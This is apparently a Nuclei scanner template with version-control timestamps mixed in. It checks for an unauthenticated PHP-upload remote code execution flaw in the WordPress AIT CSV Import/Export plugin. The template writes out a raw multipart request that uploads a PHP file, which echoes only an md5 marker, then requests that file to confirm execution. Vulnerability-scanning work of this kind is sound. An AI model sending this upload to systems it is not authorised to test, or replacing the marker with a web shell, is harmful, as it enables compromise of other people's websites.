2022-05-22 01:12:09 +00:00
id : ait-csv-import-export-rce
info :
name : WordPress AIT CSV Import Export - Unauthenticated Remote Code Execution
author : gy741
severity : critical
2022-05-23 08:34:27 +00:00
description : |
The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The upload-handler does not require authentication, nor validates the uploaded content.
2022-05-22 01:12:09 +00:00
reference :
- https://wpscan.com/vulnerability/10471
2022-05-23 08:34:27 +00:00
- https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_ait_csv_rce.rb
2022-05-22 01:12:09 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 9.8
cwe-id : CWE-434
2022-09-01 10:51:29 +00:00
tags : wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2022-05-22 01:12:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-22 01:12:09 +00:00
- raw :
- |
POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : multipart/form-data; boundary=------------------------ab360007dbae2de8
--------------------------ab360007dbae2de8
Content-Disposition : form-data; name="file"; filename="{{randstr}}.php"
Content-Type : application/octet-stream
2022-05-23 08:34:27 +00:00
sep=;<?php echo md5('ait-csv-import-export-rce');?>
2022-05-22 01:12:09 +00:00
--------------------------ab360007dbae2de8--
- |
GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
words :
- "fe394b60dc324c3bac3060d600ad4349"
- type : status
status :
- 200